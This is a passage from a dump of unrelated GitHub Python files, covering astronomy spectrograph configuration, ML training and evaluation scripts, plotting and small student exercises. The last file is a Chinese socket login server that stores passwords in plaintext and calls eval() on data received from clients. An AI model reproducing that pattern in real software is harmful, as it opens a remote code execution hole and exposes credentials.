print(\"Training %d max_iter\" % (i))\n# mlp = MLPClassifier(max_iter=i, random_state=0)\n# mlp.fit(norm_X_train,Y_train)\n# train_scores.append(mlp.score(norm_X_train, Y_train))\n# test_scores.append(mlp.score(norm_X_test, Y_test))\n#\n# plt.plot(np.arange(70,90,1), train_scores)\n# plt.plot(np.arange(70,90,1), test_scores)\n# plt.legend(['train acc','test acc'])\n# plt.show()\n\n################################################################################\n# Used to find the optimal parameters for the SVM model\n# C = 2 and kernel = 'rbf'\n################################################################################\n# C = np.array([0.25,0.5,0.75,1,1.25,1.5,1.75,2,2.25,2.5])\n# kernels = ['linear','poly','rbf','sigmoid']\n# for c in C:\n# for k in kernels:\n# svm = SVC(C = c, kernel = k)\n# svm.fit(norm_X_train,Y_train)\n# print(\"C: %f, kernel: %s, accuracy: %.8f\" % (c, k, svm.score(norm_X_test,Y_test)))\n","repo_name":"cmoroz1/ML-gender-recog","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"28510783418","text":"# -*- coding: utf-8 -*-\n# 3.0\n\n# \n\nimport matplotlib as mp\nimport pandas as pd\nimport sqlite3 as sq\nimport matplotlib.pyplot as plt\nimport sys\nimport os\nimport pylab\nimport argparse\n\n# \n\nargparser = argparse.ArgumentParser()\nargparser.add_argument('--plot_output',default='',help='specify the plot output location')\nargparser.add_argument('--db_folder_path',default='',help='specify the folder location of db')\nargparser.add_argument('--db_file_name',default='',help='specify name of db')\n\n# \n\n# args = argparser.parse_args()\n# folderpath = args.db_folder_path\n# #raw_input(\"Enter folder name: \")\n# database_filename = args.db_file_name\n# #raw_input(\"Enter database file name (with .db): \")\n\nfolderpath='../cse-B85-HD3'\ndatabase_filename='cse-B85-HD3.db'\n\n\nif len(folderpath)>0:\n\tdatabasepath = str(folderpath) + '/'+str(database_filename)\nelse:\n\tdatabasepath= str(database_filename)\n\n# \n\nconnection = sq.connect(databasepath)\n\n# \n\nproject_cursor = connection.cursor()\nproject_cursor.execute('SELECT id,name FROM program')\nproject_table = pd.DataFrame(columns=['program_id','program_name'],index=None)\nfor project in project_cursor:\n project_table.loc[len(project_table)]=[project[0],project[1]] \n \nfirstrow=project_table.head()\n\n# \n\nN=firstrow.program_name.count()\nfor i in range(N):\n row_project_name = str(firstrow.program_name[i])\n row_project_id = str(firstrow.program_id[i])\n configuration_cursor = connection.cursor()\n program_id_val = (row_project_id,)\n configuration_cursor.execute('SELECT id,time,result_id FROM (SELECT id FROM configuration where program_id = ?) INNER JOIN (SELECT id as result_id,configuration_id, [time] FROM result WHERE time is not 10000.0) ON id = configuration_id',program_id_val)\n df= pd.DataFrame(columns=['config_id','time','result_id'])\n index_no=[]\n counter = 0\n for row in configuration_cursor:\n counter = counter+1\n index_no.append(counter)\n df.loc[len(df)]=[row[0],row[1],row[2]]\n \n \n df.time=100/df.time\n df_result_id = df.sort('result_id')\n df_time = df.sort('time')\n \n plt.clf()\n plt.scatter(index_no, df_result_id.time)\n plt.ylabel('run time in ops_per_min')\n plt.xlabel('result index')\n plt.grid(True)\n plt.savefig('plots/sorted_result_id_'+row_project_name+'.pdf')\n \n plt.clf()\n plt.scatter(index_no,df_time.time)\n plt.ylabel('run time in ops_per_min')\n plt.xlabel('result index')\n plt.grid(True)\n plt.savefig('plots/sorted_opes_per_min'+row_project_name+'.pdf')\n\n# \n\n\n","repo_name":"sarubi/JATTHotspotTuner","sub_path":"Common/opentuner_results_plot.py","file_name":"opentuner_results_plot.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"30"} +{"seq_id":"17864976694","text":"\"\"\" Module for Magellan/MAGE specific codes\n\"\"\"\nimport numpy as np\n\nfrom astropy.time import Time\nfrom astropy.io import fits\n\nfrom pypeit import msgs\nfrom pypeit import telescopes\nfrom pypeit.core import framematch\nfrom pypeit.core import parse\nfrom pypeit.par import pypeitpar\nfrom pypeit.spectrographs import spectrograph\nfrom pypeit.images import detector_container\nfrom pypeit import debugger\n\nfrom IPython import embed\n\nclass MagellanMAGESpectrograph(spectrograph.Spectrograph):\n \"\"\"\n Child to handle Magellan/MAGE specific code\n \"\"\"\n def __init__(self):\n # Get it started\n super(MagellanMAGESpectrograph, self).__init__()\n self.spectrograph = 'magellan_mage'\n self.camera = 'MagE'\n self.telescope = telescopes.MagellanTelescopePar()\n ndet = 1\n\n def get_detector_par(self, hdu, det):\n \"\"\"\n Return a DectectorContainer for the current image\n\n Args:\n hdu (`astropy.io.fits.HDUList`):\n HDUList of the image of interest.\n Ought to be the raw file, or else..\n det (int):\n\n Returns:\n :class:`pypeit.images.detector_container.DetectorContainer`:\n\n \"\"\"\n # Binning\n binning = self.get_meta_value(self.get_headarr(hdu), 'binning') # Could this be detector dependent??\n\n # Detector 1\n detector_dict = dict(\n binning = binning,\n det = 1,\n dataext = 0,\n specaxis = 1,\n specflip = True,\n spatflip = False,\n # plate scale in arcsec/pixel\n platescale = 0.3,\n # electrons/pixel/hour. From: http://www.lco.cl/telescopes-information/magellan/instruments/mage/the-mage-spectrograph-user-manual\n darkcurr = 1.00,\n saturation = 65535.,\n # CCD is linear to better than 0.5 per cent up to digital saturation (65,536 DN including bias) in the Fast readout mode.\n nonlinear = 0.99,\n mincounts = -1e10,\n numamplifiers = 1,\n gain = np.atleast_1d(1.02), # depends on the readout\n ronoise = np.atleast_1d(2.9), # depends on the readout\n datasec = np.atleast_1d('[1:1024, 1:2048]'),\n oscansec = np.atleast_1d('[1:1024, 2049:2176]'),\n )\n # Taken from the MASE paper: https://arxiv.org/pdf/0910.1834.pdf\n #self.norders = 15\n # 20-6\n return detector_container.DetectorContainer(**detector_dict)\n\n @property\n def pypeline(self):\n return 'Echelle'\n\n def default_pypeit_par(self):\n \"\"\"\n Set default parameters for magellan MagE reduction.\n \"\"\"\n par = pypeitpar.PypeItPar()\n par['rdx']['spectrograph'] = 'magellan_mage'\n # Bias\n #par['calibrations']['biasframe']['useframe'] = 'overscan'\n # Wavelengths\n # 1D wavelength solution\n par['calibrations']['wavelengths']['rms_threshold'] = 0.20 # Might be grating dependent..\n par['calibrations']['wavelengths']['sigdetect'] = 5.0\n par['calibrations']['wavelengths']['lamps'] = ['ThAr_MagE']\n #par['calibrations']['wavelengths']['nonlinear_counts'] = self.detector[0]['nonlinear'] * self.detector[0]['saturation']\n\n par['calibrations']['wavelengths']['method'] = 'reidentify'\n par['calibrations']['wavelengths']['cc_thresh'] = 0.50\n par['calibrations']['wavelengths']['cc_local_thresh'] = 0.50\n\n # Reidentification parameters\n par['calibrations']['wavelengths']['reid_arxiv'] = 'magellan_mage.fits'\n par['calibrations']['wavelengths']['ech_fix_format'] = True\n # Echelle parameters\n par['calibrations']['wavelengths']['echelle'] = True\n par['calibrations']['wavelengths']['ech_nspec_coeff'] = 4\n par['calibrations']['wavelengths']['ech_norder_coeff'] = 4\n par['calibrations']['wavelengths']['ech_sigrej'] = 3.0\n\n par['scienceframe']['process']['sigclip'] = 20.0\n par['scienceframe']['process']['satpix'] = 'nothing'\n\n # Set slits and tilts parameters\n par['calibrations']['tilts']['tracethresh'] = [10]*self.norders\n par['calibrations']['slitedges']['fit_order'] = 5\n par['calibrations']['slitedges']['max_shift_adj'] = 3.\n par['calibrations']['slitedges']['edge_thresh'] = 10. # Tough to get the bluest orders\n par['calibrations']['slitedges']['left_right_pca'] = True\n par['calibrations']['slitedges']['fit_min_spec_length'] = 0.3 # Allow for a short detected blue order\n # Find object parameters\n par['reduce']['findobj']['find_trim_edge'] = [4,4] # Slit is too short to trim 5,5 especially with 2x binning\n # Always flux calibrate, starting with default parameters\n # Do not correct for flexure\n par['flexure']['spec_method'] = 'skip'\n # Set the default exposure time ranges for the frame typing\n par['calibrations']['standardframe']['exprng'] = [None, 20]\n par['calibrations']['arcframe']['exprng'] = [20, None]\n par['calibrations']['darkframe']['exprng'] = [20, None]\n par['scienceframe']['exprng'] = [20, None]\n return par\n\n def init_meta(self):\n \"\"\"\n Generate the meta data dict\n Note that the children can add to this\n\n Returns:\n self.meta: dict (generated in place)\n\n \"\"\"\n meta = {}\n # Required (core)\n meta['ra'] = dict(ext=0, card='RA')\n meta['dec'] = dict(ext=0, card='DEC')\n meta['target'] = dict(ext=0, card='OBJECT')\n #TODO: Check decker is correct\n meta['decker'] = dict(ext=0, card='SLITNAME')\n meta['binning'] = dict(card=None, compound=True)\n# self.meta['binning'] = dict(ext=0, card='BINNING')\n meta['mjd'] = dict(ext=0, card=None, compound=True)\n meta['exptime'] = dict(ext=0, card='EXPTIME')\n meta['airmass'] = dict(ext=0, card='AIRMASS')\n # Extras for config and frametyping\n meta['dispname'] = dict(ext=0, card='INSTRUME')\n meta['idname'] = dict(ext=0, card='EXPTYPE')\n\n # Ingest\n self.meta = meta\n\n def compound_meta(self, headarr, meta_key):\n \"\"\"\n\n Args:\n headarr: list\n meta_key: str\n\n Returns:\n value\n\n \"\"\"\n if meta_key == 'binning':\n binspatial, binspec = parse.parse_binning(headarr[0]['BINNING'])\n return parse.binning2string(binspec, binspatial)\n elif meta_key == 'mjd':\n time = '{:s}T{:s}'.format(headarr[0]['UT-DATE'], headarr[0]['UT-TIME'])\n ttime = Time(time, format='isot')\n return ttime.mjd\n else:\n msgs.error(\"Not ready for this compound meta\")\n\n def configuration_keys(self):\n return []\n\n def check_frame_type(self, ftype, fitstbl, exprng=None):\n \"\"\"\n Check for frames of the provided type.\n \"\"\"\n if ftype in ['pinhole', 'dark']:\n # No pinhole or bias or dark frames\n return np.zeros(len(fitstbl), dtype=bool)\n elif ftype in ['bias']:\n return fitstbl['idname'] == 'Bias'\n elif ftype in ['pixelflat', 'trace']:\n return fitstbl['idname'] == 'Flat'\n elif ftype in ['arc']:\n return fitstbl['idname'] == 'ThAr-Lamp'\n else:\n return (fitstbl['idname'] == 'Object') \\\n & framematch.check_frame_exptime(fitstbl['exptime'], exprng)\n\n def bpm(self, filename, det, shape=None, msbias=None):\n \"\"\"\n Override parent bpm function with BPM specific to X-Shooter VIS.\n\n .. todo::\n Allow for binning changes.\n\n Parameters\n ----------\n det : int, REQUIRED\n msbias : numpy.ndarray, required if the user wishes to generate a BPM based on a master bias\n **null_kwargs:\n Captured and never used\n\n Returns\n -------\n bpix : ndarray\n 0 = ok; 1 = Mask\n\n \"\"\"\n msgs.info(\"Custom bad pixel mask for MAGE\")\n bpm_img = self.empty_bpm(filename, det, shape=shape)\n\n # Fill in bad pixels if a master bias frame is provided\n if msbias is not None:\n return self.bpm_frombias(msbias, det, bpm_img)\n\n # Get the binning\n hdu = fits.open(filename)\n binspatial, binspec = parse.parse_binning(hdu[0].header['BINNING'])\n hdu.close()\n # Do it\n bpm_img[:, :10//binspatial] = 1. # Setting BPM on the edge of the detector often leads to false edges\n bpm_img[:, 1020//binspatial:] = 1.\n # Return\n return bpm_img\n\n# TODO: Not sure if this was ever used.\n# @staticmethod\n# def slitmask(tslits_dict, pad=None, binning=None):\n# \"\"\"\n# Generic routine ton construct a slitmask image from a tslits_dict. Children of this class can\n# overload this function to implement instrument specific slitmask behavior, for example setting\n# where the orders on an echelle spectrograph end\n#\n# Parameters\n# -----------\n# tslits_dict: dict\n# Trace slits dictionary with slit boundary information\n#\n# Optional Parameters\n# pad: int or float\n# Padding of the slit boundaries\n# binning: tuple\n# Spectrograph binning in spectral and spatial directions\n#\n# Returns\n# -------\n# slitmask: ndarray int\n# Image with -1 where there are no slits/orders, and an integer where there are slits/order with the integer\n# indicating the slit number going from 0 to nslit-1 from left to right.\n#\n# \"\"\"\n#\n# # These lines are always the same\n# pad = tslits_dict['pad'] if pad is None else pad\n# slitmask = pixels.slit_pixels(tslits_dict['lcen'], tslits_dict['rcen'], tslits_dict['nspat'], pad=pad)\n#\n# return slitmask\n\n @property\n def norders(self):\n return 15 # 20-6\n\n @property\n def order_spat_pos(self):\n ord_spat_pos = np.array([0.3157, 0.3986, 0.47465896, 0.5446689, 0.60911287, 0.66850584, 0.72341316,\n 0.77448156, 0.82253604, 0.86875753, 0.91512689, 0.96524312])\n return ord_spat_pos\n\n @property\n def orders(self):\n return np.arange(17, 5, -1, dtype=int)\n\n\n @property\n def spec_min_max(self):\n spec_max = np.full(self.norders, np.inf)\n spec_min = np.full(self.norders, -np.inf)\n return np.vstack((spec_min, spec_max))\n\n def order_platescale(self, order_vec, binning=None):\n \"\"\"\n Returns the plate scale in arcseconds for each order\n\n Args:\n order_vec (np.ndarray): Order numbers\n binning (optional):\n\n Returns:\n np.ndarray: Platescale\n\n \"\"\"\n norders = len(order_vec)\n binspatial, binspec = parse.parse_binning(binning)\n return np.full(norders, 0.30*binspatial)\n\n\n","repo_name":"PepeJoseHU/PypeIt","sub_path":"pypeit/spectrographs/magellan_mage.py","file_name":"magellan_mage.py","file_ext":"py","file_size_in_byte":11086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"30"} +{"seq_id":"9503160113","text":"import turtle\nimport math\nimport random\nt = turtle.Turtle()\nhulknurgad = 0\n\ndef hulknurk(arv, pikkus):\n sisenurk = (arv - 2) * 180 / arv\n for i in range(arv):\n t.forward(pikkus)\n t.right(180 - sisenurk)\n i += 1\n \nwhile hulknurgad <= 30:\n t.up()\n t.setx(random.randint(-200, 200))\n t.sety(random.randint(-200, 200))\n t.down()\n hulknurk(random.randint(3, 20), random.randint(20, 50))\n hulknurgad += 1\n \nturtle.exitonclick()\nturtle.done()","repo_name":"ArR4e/DSProject","sub_path":"processed/K04/S145/kodu3.py","file_name":"kodu3.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"21302939258","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport math\r\n\r\n#x: xscreen: starting position on screen(m)\r\n#y: yscreen: starting postition on screen(m)\r\n\r\ndef square_intensity(a, l, D):\r\n x = np.linspace(-10, 10, 10000) ##??\r\n y = np.linspace(-10, 10, 10000) ##??\r\n y = list()\r\n for val in x:\r\n stuff_x = ((2*np.pi*a*val) / (l*D))\r\n stuff_y = ((2*np.pi*a*val) / (l*D))\r\n j = ((math.sin(stuff_x)) / (stuff_x))**2\r\n k = ((math.sin(stuff_y)) / (stuff_y))**2\r\n i = j * k\r\n y.append(i)\r\n \r\n plt.subplot(121)\r\n plt.title(\"Square: Theoretical\")\r\n #plt.plot(x,y)\r\n return[x, y]\r\n\r\n\r\n\r\n#test\r\n\r\ndef input_():\r\n #user inputs\r\n l = input(\"enter a wavelength (nm): \")\r\n l = float(l) * (10**-9)\r\n a = input(\"enter a slit width (micro m): \") #for single slit\r\n a = float(a) * (10**-6)\r\n #d = input(\"enter a slit separation (micro m): \") #for double slit\r\n #d = float(d) * (10**-10)\r\n D = input(\"enter a distance from the screen (m): \")\r\n D = float(D)\r\n #N = input(\"enter number of slits: \") #for n slit\r\n #N = int(N)\r\n #num = input(\"finally, input the number of particles: \")\r\n #num = int(num)\r\n\r\n square_intensity(a, l, D)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n #run\r\n input_()\r\n","repo_name":"ehcrook/slit_experiment","sub_path":"square_intensity.py","file_name":"square_intensity.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"15302608960","text":"import logging\nimport os\nimport numpy as np\nfrom barry.samplers.sampler import Sampler\n\n\nclass NautilusSampler(Sampler):\n def __init__(self, temp_dir=None, max_iter=None, dynamic=False, nlive=500, nupdate=None, print_progress=False):\n\n self.logger = logging.getLogger(\"barry\")\n self.max_iter = max_iter\n self.nlive = nlive\n self.nupdate = nupdate\n self.temp_dir = temp_dir\n if temp_dir is not None and not os.path.exists(temp_dir):\n os.makedirs(temp_dir, exist_ok=True)\n self.dynamic = dynamic\n self.print_progress = print_progress\n\n def get_filename(self, uid):\n return os.path.join(self.temp_dir, f\"{uid}_nautilus_chain.npy\")\n\n def fit(self, model, save_dims=None, uid=None):\n \"\"\"Runs the sampler over the model and returns the flat chain of results\n\n Parameters\n ----------\n model : class \n An instance of one of barry's model classes\n save_dims : int, optional\n Only return values for the first ``save_dims`` parameters.\n Useful to remove numerous marginalisation parameters if running\n low on memory or hard drive space.\n uid : str, optional\n A unique identifier used to differentiate different fits\n if two fits both serialise their chains and use the\n same temporary directory\n Returns\n -------\n dict\n A dictionary of results containing:\n - *chain*: the chain\n - *weights*: chain weights if applicable\n - *posterior*: posterior values for each point in the chain\n - *evidence*: Bayesian evidence for the model/data combo.\n\n \"\"\"\n import nautilus\n\n log_likelihood = model.get_posterior\n num_dim = model.get_num_dim()\n prior_transform = model.unscale\n\n assert log_likelihood is not None\n assert prior_transform is not None\n\n filename = self.get_filename(uid)\n if os.path.exists(filename):\n self.logger.info(\"Not sampling, returning result from file.\")\n return self.load_file(filename)\n self.logger.info(\"Sampling posterior now\")\n\n if save_dims is None:\n save_dims = num_dim\n self.logger.debug(\"Fitting framework with %d dimensions\" % num_dim)\n self.logger.info(\"Using dynesty Sampler\")\n sampler = nautilus.Sampler(prior_transform, log_likelihood, n_dim=num_dim, n_live=self.nlive, n_update=self.nupdate)\n sampler.run(verbose=self.print_progress)\n\n self.logger.debug(\"Fit finished\")\n\n chain, logw, likelihood = sampler.posterior()\n logz = sampler.evidence()\n weights = np.exp(logw)\n max_weight = weights.max()\n trim = max_weight / 1e5\n mask = weights > trim\n self._save(chain[mask, :], weights[mask], likelihood[mask], filename, np.zeros(len(mask))[mask] + logz, save_dims)\n return {\n \"chain\": chain[mask, :],\n \"weights\": weights[mask],\n \"posterior\": likelihood[mask],\n \"evidence\": np.zeros(len(mask))[mask] + logz,\n }\n\n def _save(self, chain, weights, likelihood, filename, logz, save_dims):\n res = np.vstack((likelihood, weights, logz, chain[:, :save_dims].T)).T\n np.save(filename, res.astype(np.float32))\n\n def load_file(self, filename):\n results = np.load(filename)\n likelihood = results[:, 0]\n weights = results[:, 1]\n logz = results[:, 2]\n flat_chain = results[:, 3:]\n return {\"chain\": flat_chain, \"posterior\": likelihood, \"evidence\": logz, \"weights\": weights}\n","repo_name":"Samreay/Barry","sub_path":"barry/samplers/nautilus_sampler.py","file_name":"nautilus_sampler.py","file_ext":"py","file_size_in_byte":3685,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"30"} +{"seq_id":"5514454555","text":"#!/usr/bin/env python3\n\nimport pandas as pd\n\ndef best_record_company():\n # top40UK\n top40UK = pd.read_csv(\"src/UK-top40-1964-1-2.tsv\", sep='\\t')\n print(top40UK.shape)\n\n # here we going to group by WoC and sum\n publisher_stats = top40UK.groupby('Publisher')['WoC'].sum()\n \n \n # find the best publisher by maximum WoC sum. \n # it return the index or key of maximum value from pandas series\n best_pubisher = publisher_stats.idxmax()\n\n # now we extract data frame of the best publisher from the original top40UK\n best_pubisher_record = top40UK[top40UK['Publisher'] == best_pubisher]\n \n return best_pubisher_record\n\ndef main():\n best_record_company()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Zumh/dataAnalysis2023","sub_path":"part05-e05_best_record_company/src/best_record_company.py","file_name":"best_record_company.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31485818134","text":"import argparse\n\nimport os\nimport torch\nimport torch.nn.functional as F\nimport torchvision.transforms as T\n\nimport yaml\nfrom torchvision.transforms.functional import InterpolationMode\n\nfrom data.coco_data import CocoDataModule\nfrom data.voc_data import VOCDataModule\nfrom model.align_model import AlignSegmentor\nfrom utils import PredsmIoU\n\n\ndef norm(t):\n return F.normalize(t, dim=-1, eps=1e-10)\n\n\ndef eval_overcluster():\n with open(args.config_path) as file:\n config = yaml.safe_load(file.read())\n # print('Config: ', config)\n\n data_config = config['data']\n val_config = config['val']\n input_size = data_config[\"size_crops\"]\n torch.manual_seed(val_config['seed'])\n torch.cuda.manual_seed_all(val_config['seed'])\n\n # Init data and transforms\n val_image_transforms = T.Compose([T.Resize((input_size, input_size)),\n T.ToTensor(),\n T.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])\n val_target_transforms = T.Compose([T.Resize((input_size, input_size), interpolation=InterpolationMode.NEAREST),\n T.ToTensor()])\n\n data_dir = data_config[\"data_dir\"]\n dataset_name = data_config[\"dataset_name\"]\n if dataset_name == \"voc\":\n ignore_index = 255\n num_classes = 21\n data_module = VOCDataModule(batch_size=val_config[\"batch_size\"],\n return_masks=True,\n num_workers=config[\"num_workers\"],\n train_split=\"trainaug\",\n val_split=\"val\",\n data_dir=data_dir,\n train_image_transform=None,\n drop_last=True,\n val_image_transform=val_image_transforms,\n val_target_transform=val_target_transforms)\n elif \"coco\" in dataset_name:\n assert len(dataset_name.split(\"-\")) == 2\n mask_type = dataset_name.split(\"-\")[-1]\n assert mask_type in [\"all\", \"stuff\", \"thing\"]\n if mask_type == \"all\":\n num_classes = 27\n elif mask_type == \"stuff\":\n num_classes = 15\n elif mask_type == \"thing\":\n num_classes = 12\n ignore_index = 255\n file_list = os.listdir(os.path.join(data_dir, \"images\", \"train2017\"))\n file_list_val = os.listdir(os.path.join(data_dir, \"images\", \"val2017\"))\n # random.shuffle(file_list_val)\n data_module = CocoDataModule(batch_size=val_config[\"batch_size\"],\n num_workers=config[\"num_workers\"],\n file_list=file_list,\n data_dir=data_dir,\n file_list_val=file_list_val,\n mask_type=mask_type,\n train_transforms=None,\n val_transforms=val_image_transforms,\n val_target_transforms=val_target_transforms)\n elif dataset_name == \"ade20k\":\n num_classes = 111\n ignore_index = 255\n val_target_transforms = T.Compose([T.Resize((input_size, input_size), interpolation=InterpolationMode.NEAREST)])\n data_module = None\n else:\n raise ValueError(f\"{dataset_name} not supported\")\n\n # Init method\n patch_size = val_config[\"patch_size\"]\n spatial_res = input_size / patch_size\n assert spatial_res.is_integer()\n model = AlignSegmentor(arch=val_config['arch'],\n patch_size=val_config['patch_size'],\n embed_dim=val_config['embed_dim'],\n hidden_dim=val_config['hidden_dim'],\n num_heads=val_config['decoder_num_heads'],\n num_queries=val_config['num_queries'],\n num_decode_layers=val_config['num_decode_layers'],\n last_self_attention=val_config['last_self_attention'])\n\n # set model to eval mode\n for p in model.parameters():\n p.requires_grad = False\n model.eval()\n model.to(cuda)\n\n # load pretrained weights\n if val_config[\"checkpoint\"] is not None:\n checkpoint = torch.load(val_config[\"checkpoint\"])\n msg = model.load_state_dict(checkpoint[\"state_dict\"], strict=True)\n print(msg)\n else:\n print('no pretrained pth found!')\n\n dataloader = data_module.val_dataloader()\n metric = PredsmIoU(val_config['num_queries'], num_classes)\n\n # Calculate IoU for each image individually\n for idx, batch in enumerate(dataloader):\n imgs, masks = batch\n B = imgs.size(0)\n assert B == 1 # image has to be evaluated individually\n all_queries, tokens, _, _, res, _ = model([imgs.to(cuda)]) # tokens=(1,N,dim)\n\n # calculate token assignment\n token_cls = torch.einsum(\"bnc,bqc->bnq\", norm(tokens), norm(all_queries[0]))\n token_cls = torch.softmax(token_cls, dim=-1)\n token_cls = token_cls.reshape(B, res, res, -1).permute(0, 3, 1, 2) # (1,num_query,res,res)\n token_cls = token_cls.max(dim=1, keepdim=True)[1].float() # (1,1,res,res)\n\n # downsample masks/upsample preds to masks_eval_size\n preds = F.interpolate(token_cls, size=(val_config['mask_eval_size'], val_config['mask_eval_size']), mode='nearest')\n masks *= 255\n if masks.size(3) != val_config['mask_eval_size']:\n masks = F.interpolate(masks, size=(val_config['mask_eval_size'], val_config['mask_eval_size']), mode='nearest')\n\n metric.update(masks[masks != ignore_index], preds[masks != ignore_index])\n # sys.exit(1)\n\n metric.compute()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--config_path', default='../configs/eval_voc_config.yml', type=str)\n parser.add_argument('--gpu', default='0', type=str)\n\n args = parser.parse_args()\n\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = str(args.gpu)\n cuda = torch.device('cuda')\n eval_overcluster()\n","repo_name":"yliu1229/AlignSeg","sub_path":"evaluate/sup_overcluster.py","file_name":"sup_overcluster.py","file_ext":"py","file_size_in_byte":6231,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"72961083562","text":"import glob\nimport time\nimport pickle\nimport random\nimport cv2 as cv\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\n\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D\n\n## --------------------------------------------\n\nnegative_dir = glob.glob('dataset/negative/*.png')\npositive_dir = glob.glob('dataset/positive/*.png')\n\nplane = []\nnot_plane = []\nlabel = []\n\nfor image in negative_dir:\n not_plane.append(image)\n label.append(0)\n\nfor image in positive_dir:\n plane.append(image)\n label.append(1)\n\nprint(\"# of not_plane:\\t\", len(not_plane))\nprint(\"# of plane:\\t\", len(plane))\n## --------------------------------------------\n\nX = not_plane + plane\ny = np.array(label)\ny = y.reshape(y.shape[0],1)\n\nassert len(X)==len(y), \"mismatch in data and label size\"\n\n# ## Exploratory data\n# for _ in range(5):\n# n = random.randint(0, len(X)-1)\n# img_ = plt.imread(X[n])\n# label_ = \"Exploratory data\\n\" + (\"plane\" if y[n] else \"not plane\")\n# plt.imshow(img_)\n# plt.title(label_)\n# plt.show()\n## --------------------------------------------\n\n## convert to grayscale and flatten data\ndef gryImages(images):\n gry_images = []\n for x in images:\n img = cv.imread(x)\n img = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n gry_images.append(img)\n return gry_images\n\nX = np.array(gryImages(X))\n\n## --------------------------------------------\n\nX = X.reshape(X.shape[0], X.shape[1], X.shape[2], 1)\ninput_shape = (X.shape[1], X.shape[2], 1)\n## --------------------------------------------\n\n## train test split\nrand_state = np.random.randint(0, 100)\nX_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.3, random_state=rand_state)\n## --------------------------------------------\nX_train = X_train.astype('float32')\nX_test = X_test.astype('float32')\n## normalize\nX_train /= 255\nX_test /= 255\nprint()\nprint(X_train.shape[0], 'train samples')\nprint(X_test.shape[0], 'test samples')\n\nnum_classes = 2\ny_train = keras.utils.to_categorical(y_train, num_classes)\ny_test = keras.utils.to_categorical(y_test, num_classes)\n##------------------------------------------------\n\nbatch_size = 128\nepochs = 12\n\nmodel = Sequential()\nmodel.add(Conv2D(32, kernel_size=(3, 3),\n activation='relu',\n input_shape=input_shape))\nmodel.add(Conv2D(64, (3, 3), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\nmodel.add(Flatten())\nmodel.add(Dense(128, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(num_classes, activation='softmax'))\n\nmodel.compile(loss=keras.losses.categorical_crossentropy,\n optimizer=keras.optimizers.Adadelta(),\n metrics=['accuracy'])\n\nmodel.fit(X_train, y_train,\n batch_size=batch_size,\n epochs=epochs,\n verbose=1,\n validation_data=(X_test, y_test))\n\nscore = model.evaluate(X_test, y_test, verbose=0)\n\nprint('Test loss:', score[0])\nprint('Test accuracy:', score[1])\n\n## -------------------------------------------------------------------\n# save model\nmodel_name = \"./models/lenet_like_model.h5\"\nmodel.save(model_name)\n","repo_name":"askmuhsin/airplane_classifier","sub_path":"cnn_classifier.py","file_name":"cnn_classifier.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5448213472","text":"# 1.简述二层交换机 & 路由器 & 三层交换机的作用。\r\n'''\r\n二层交换机能维护接口和地址\r\n路由器可以叫交换机连接在一起,从而连接到另一个二层交换机\r\n三层交换机继承了二层交换机和路由器的功能\r\n'''\r\n# 2.简述常见词:IP、子网掩码、DHCP、公网IP、端口、域名的作用。\r\n'''\r\nIP:IP是一个32位的二进制,方便记忆将其分为4组,每组8位,转换为十进制最大为255.255.255.255,又分为网络IP和主机IP\r\n子网掩码:被子网掩码掩盖的IP是网络IP,二进制数都是1,剩余的是主机IP,\r\nDHCP:提供连接到不同的路由器会自动设置IP、子网掩码、网关的功能\r\n端口:IP后面加端口可以访问指定的网页\r\n域名:由于IP和端口太难记忆,域名可以绑定IP对应的端口,方便记忆\r\n'''\r\n\r\n# 3.实现远程用户认证系统。\r\n\r\n\r\n# 服务端:\r\n# 1.客户端连接上服务端,返回欢迎使用xx系统信息。\r\n# 2.等待客户端发送用户名和密码进行校验(用户名和密码在文件中)\r\n# 3.登录失败,返回错误信息。\r\n# 4.登录成功,返回成功提示的内容。\r\n\r\nimport socket\r\n\r\nlst = [{'用户名': '10010', '密码': '123456'}, {'用户名': '10086', '密码': '1111'}]\r\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 配置,创建sock对象\r\nsock.bind(('127.0.0.1', 8001)) # 固定IP以及端口\r\nsock.listen(5)\r\nconn, addr = sock.accept() # 等待用户端连接,接收连接\r\nconn.sendall('欢迎使用登录系统'.encode('utf-8')) # 连接成功返回提示信息\r\nclient_info = conn.recv(1024) # 接收客户端发来的信息\r\nclient_info = client_info.decode('utf-8') # 将二进制转换为utf-8\r\nprint(client_info)\r\nif not client_info:\r\n print('系统关闭')\r\n conn.close()\r\nelse:\r\n for i in lst:\r\n if eval(client_info) == i: # eval()将字符串转换成字典\r\n conn.sendall('登录成功'.encode('utf-8'))\r\n break\r\n else:\r\n conn.sendall('账号或密码输入错误'.encode('utf-8'))\r\n\r\n 